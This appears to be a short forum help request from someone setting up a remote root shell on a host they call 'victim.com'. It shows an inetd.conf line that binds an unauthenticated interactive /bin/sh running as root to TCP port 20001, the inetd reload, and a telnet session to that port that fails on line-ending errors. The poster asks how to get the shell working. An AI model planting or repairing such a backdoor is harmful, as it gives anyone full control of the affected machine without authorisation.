How can I get the Shell?
- victim.com -
#
# vi /etc/inetd.conf
.
.
20001 stream tcp nowait root /bin/sh sh -i
.
.
~
~
#
# pkill -HUP inetd
#
- another machine -
# telnet victim.com 20001
Trying 192.168.0.10...
Connected to 192.168.0.10.
Escape character is '^]'.
( ENTER )
sh: ^M: not found
( Input 'ls' and ENTER)
sh: ls^M: not found
( Input 'ls -al' and ENTER)
ls: illegal option --
usage: ls -1RaAdCxmnlogrtucpFbqisfL [files]
( Input '^M' )
sh: ^M: not found
^]
telnet> quit
Connection closed.
#
#
What's the problem?
How can I get the shell?
Help me, plz~~

